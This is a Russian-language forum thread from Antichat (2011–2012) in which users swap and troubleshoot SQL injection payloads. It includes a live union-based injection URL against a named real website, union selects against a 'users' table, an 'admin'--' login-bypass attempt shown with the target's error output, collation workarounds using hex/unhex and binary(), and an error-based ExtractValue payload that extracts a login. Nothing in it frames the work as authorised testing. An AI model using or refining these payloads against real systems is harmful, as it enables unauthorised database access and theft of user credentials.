ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.07.2011, 15:39
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
Провел на форуме:
10077
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
Код:
Code:
http://www.earthcharter.ru/index.php?cnt=86)and(1=0)union(select(version()),2,3,4,5,6,7)--+
Круто! Спасибо!
Где такому учат? Здесь все 19 страниц прочитал, ничего подбного не встречал
|
|
|
18.07.2011, 15:47
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Ээээм, учебник по SQL?
|
|
|
|
18.07.2011, 15:48
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от netruxa
netruxa said:
Круто! Спасибо!
Где такому учат? Здесь все 19 страниц прочитал, ничего подбного не встречал
Учат синтаксис, тип запросов, функции MySQL- dev.mysql.com. А не статьи по использованию SQL-инъекций.
|
|
|
|
18.07.2011, 17:31
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
Провел на форуме:
10077
Репутация:
0
|
|
ну вот это объясните пожалуйста
86)and(1=0)
по идеи, если 1=0 должен false возвращаться и вообще ничего не должно выводиться?
|
|
|
|
01.08.2011, 14:59
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
Провел на форуме:
10077
Репутация:
0
|
|
Подскажите, пожалуйста, как решается эта проблема?
Сообщение от None
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_unicode_ci,IMPLICIT) for operation 'UNION'
Запрос вида
Сообщение от None
-1%27+union+select+*+from+(select+1,2,3,4,5,6)a,use rs,(select+1,2,3,4,5,6,7,8)b+--+
версия БД 4.1.12-standard-log, поэтому решил так извратиться
версию узнавал таким образом
Сообщение от None
-1%27+union+select+1,2,3,4,5,6,hex(version()),8,9,1 0,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,29+--+
если hex() не писать, то вылазит ошибка, которая в самом начале поста |
|
|
|
01.08.2011, 16:05
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
unhex(hex(version()))
в статье разве этого нет?
|
|
|
|
01.08.2011, 16:10
|
|
Новичок
Регистрация: 21.04.2008
Сообщений: 1
Провел на форуме:
10077
Репутация:
0
|
|
Да когда одна переменная, понятно, что ее мона захексить и разхексить.
а что делать при таком формате запроса?
-1'+union+select+*+from+(select+1,2,3,4,5,6)a, users,(select+1,2,3,4,5,6,7,8)b+--+
|
|
|
|
05.01.2012, 00:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
18364
Репутация:
0
|
|
в чем трабла ? ошибка в поле логин, все время пишет
Message: MySQL Query fail: SELECT user_pass, user_salt, user_groupid, user_id FROM `users` WHERE user_name = ''--'
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
пробовал зайти как админ прописав в логине admin'-- , но никак..
пробовал group и order писать , тоже ноль .
через union не получается
|
|
|
|
29.01.2012, 11:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
33658
Репутация:
19
|
|
Re: 4.3 Проблемы с кодировками
Есть еще функция binary() которая выводит все как есть.
И никаких проблем с кодировкой.
SELECT binary(user()) FROM mysql.user
И никаких unhex(hex()) не требуется.
Проверено временем и дорогами.
|
|
|
|
01.03.2012, 18:34
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723
Репутация:
10
|
|
Подскажите пожалуйста как в concat запихать insert, да так, чтобы пробелы были заменены чем либо. Вот как делается select (спасибо M_Script):
Код:
Code:
(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
